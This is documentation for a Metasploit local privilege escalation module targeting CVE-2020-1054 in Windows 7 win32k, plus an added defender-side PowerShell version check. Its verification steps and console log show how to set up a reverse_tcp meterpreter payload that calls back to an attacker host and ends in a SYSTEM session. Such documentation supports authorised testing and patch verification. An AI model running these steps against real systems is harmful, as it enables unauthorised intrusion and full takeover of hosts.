## Vulnerable Application

This module exploits CVE-2020-1054, an out-of-bounds write reachable from `DrawIconEx`
within win32k. The out-of-bounds write can be used to overwrite the `pvBits` pointer of a
`SURFOBJ`. By using this vulnerability to perform controlled writes to kernel
memory, an attacker can gain arbitrary code execution as the SYSTEM user.

This module has been tested against a fully updated Windows 7 x64 SP1. Offsets
within the exploit code may need to be adjusted to work with other versions of
Windows.
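
The following PowerShell script is an added defender-side check and is not part of the Metasploit module. It reports the installed `win32k.sys` file version on a Windows 7 host and compares it with 6.1.7601.24542, the only build this page records as vulnerable (the scenario below). It assumes nothing about the build that contains Microsoft's fix: `$FirstFixedVersion` is a placeholder the operator must fill in from the vendor advisory for CVE-2020-1054, and until it is set the script only says whether the host is at or below the tested build. Windows 7 SP1 ships PowerShell 2.0, so the script avoids PowerShell 3+ syntax.

```powershell
# Added example (not from the module): report whether a Windows 7 SP1 host's
# win32k.sys is at or below the build this module was tested against.
# Assumptions:
#  - 6.1.7601.24542 comes from the page's test scenario; it is a known-vulnerable
#    build, not the boundary of the vulnerable range.
#  - $FirstFixedVersion is a PLACEHOLDER; set it from Microsoft's advisory for
#    CVE-2020-1054 before relying on the "fixed" verdict.

$KnownVulnerableVersion = New-Object System.Version '6.1.7601.24542'
$FirstFixedVersion      = $null   # placeholder, e.g. New-Object System.Version '<fixed build from advisory>'

function Get-Win32kStatus {
    $path = Join-Path $env:SystemRoot 'System32\win32k.sys'
    if (-not (Test-Path $path)) {
        return New-Object PSObject -Property @{
            Path = $path; Version = $null; Status = 'win32k.sys not found'
        }
    }

    # Build the version from the numeric parts rather than parsing the
    # free-form FileVersion string, which on Windows 7 carries a branch suffix.
    $vi  = (Get-Item $path).VersionInfo
    $ver = New-Object System.Version -ArgumentList $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart

    # Only Windows 7 / Server 2008 R2 builds (6.1.x) are comparable to the tested build.
    if ($ver.Major -ne 6 -or $ver.Minor -ne 1) {
        $status = 'not a 6.1 (Windows 7) build; compare against the advisory for this OS version instead'
    }
    elseif ($FirstFixedVersion -and $ver -ge $FirstFixedVersion) {
        $status = 'at or above the configured fixed build'
    }
    elseif ($ver -le $KnownVulnerableVersion) {
        $status = 'at or below the build this module was tested against; treat as vulnerable until the CVE-2020-1054 update is confirmed'
    }
    else {
        $status = 'newer than the tested build; confirm the CVE-2020-1054 update is installed before treating as patched'
    }

    New-Object PSObject -Property @{ Path = $path; Version = $ver; Status = $status }
}

Get-Win32kStatus | Format-List Path, Version, Status
```

Run it in an elevated or a standard PowerShell session on the host under review; reading the file version needs no special privilege. Because the page gives only one vulnerable build, the script deliberately refuses to call a host "patched" until `$FirstFixedVersion` has been filled in from the advisory.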

## Verification Steps

1. Get a non-SYSTEM meterpreter session on Windows 7 SP1 x64
1. `use exploit/windows/local/cve_2020_1054_drawiconex_lpe`
1. `set session <session>`
1. `set payload windows/x64/meterpreter/reverse_tcp`
1. `set LHOST <LHOST>`
1. `set LPORT 5555`
1. `exploit`
1. Get a SYSTEM session

## Scenarios

### Windows 7 SP1 x64 with win32k.sys Version 6.1.7601.24542

```
$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.13.37; set lport 4444; set ExitOnSession false; run -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.13.37
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.13.37:4444
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to 192.168.13.106
[*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.106:49216) at 2020-11-26 13:56:39 +0000

msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_1054_drawiconex_lpe
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set LPORT 5555
LPORT => 5555
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > run

[*] Started reverse TCP handler on 192.168.13.37:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing exploit...
[*] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.13.106
[*] Meterpreter session 2 opened (192.168.13.37:5555 -> 192.168.13.106:49217) at 2020-11-26 13:57:08 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
